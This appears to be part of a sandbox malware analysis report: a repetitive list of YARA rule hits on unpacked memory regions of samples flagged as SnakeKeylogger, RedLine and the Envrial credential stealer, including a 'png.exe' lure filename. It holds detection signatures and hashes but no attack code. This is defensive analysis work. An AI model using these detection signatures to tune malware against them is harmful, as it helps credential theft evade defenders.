                      Source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.3.Native_snake01.exe.5e03c0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.4a50000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c1216.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.5100000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 9.2.RFQ_PO_98473009.png.exe.27b4740.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
